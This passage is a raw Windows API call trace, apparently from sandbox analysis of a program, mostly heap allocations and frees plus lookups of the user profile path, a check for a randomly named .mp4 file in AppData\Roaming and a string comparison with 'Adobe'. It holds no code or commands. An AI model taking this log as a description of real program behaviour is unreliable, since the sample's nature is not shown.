HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0113.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0113.618] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0113.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0113.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0113.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0113.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0113.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0113.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0113.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0113.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0113.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0113.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0113.619] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0113.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0113.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0113.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0113.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0113.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0113.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0113.619] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0113.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0113.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0113.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0113.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0113.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0113.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0113.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0113.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0113.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0113.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0113.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0113.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0113.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0113.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0113.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0113.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0113.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0113.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0113.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0113.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0113.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0113.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0113.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0113.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0113.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0113.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0113.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0113.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0113.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0113.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0113.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0113.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0113.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0113.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0113.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5c) returned 0x2a68440 [0113.620] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/5sRVNiax4.mp4", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\5sRVNiax4.mp4", lpFilePart=0x8cf650*="5sRVNiax4.mp4") returned 0x2d [0113.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0113.620] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\5sRVNiax4.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\5srvniax4.mp4")) returned 0xffffffff [0113.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0113.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0113.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0113.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0113.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0113.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0113.621] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0113.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0113.621] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0113.621] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0113.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0113.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0113.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0113.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0113.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0113.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0113.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0113.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0113.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0113.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0113.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0113.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0113.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Adobe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0113.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0113.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0113.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0113.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0113.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0113.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0113.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0113.621] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0113.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0113.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0113.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0113.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0113.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0113.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0113.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0113.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0113.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0113.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0113.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0113.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0113.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0113.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0113.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0113.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0113.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0113.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0113.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0113.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0113.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0113.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0113.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0113.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0113.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0113.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0113.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0113.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0113.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0113.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0113.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0113.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0113.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0113.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0113.623] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0113.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0113.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0113.623] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0113.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0113.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0113.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0113.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721f8 [0113.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0113.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0113.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0113.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0113.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0113.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0113.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0113.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0113.623] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0113.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0113.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0113.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0113.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0113.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0113.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0113.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0113.624] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0113.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0113.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0113.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0113.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0113.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0113.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0113.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0113.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0113.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0113.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0113.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0113.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0113.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0113.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0113.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0113.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0113.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0113.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0113.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0113.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0113.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0113.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0113.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0113.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0113.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0113.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72228 [0113.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0113.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0113.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0113.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0113.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0113.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0113.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0113.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0113.625] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0113.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0113.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0113.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0113.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0113.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0113.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9040 [0113.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0113.625] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0113.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0113.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0113.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0113.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0113.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0113.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0113.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0113.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0113.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0113.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0113.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0113.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0113.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0113.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0113.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0113.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0113.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0113.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0113.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0113.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0113.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0113.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0113.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0113.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0113.626] RtlAllocateHeap (HeapHandle=0x2af0000, 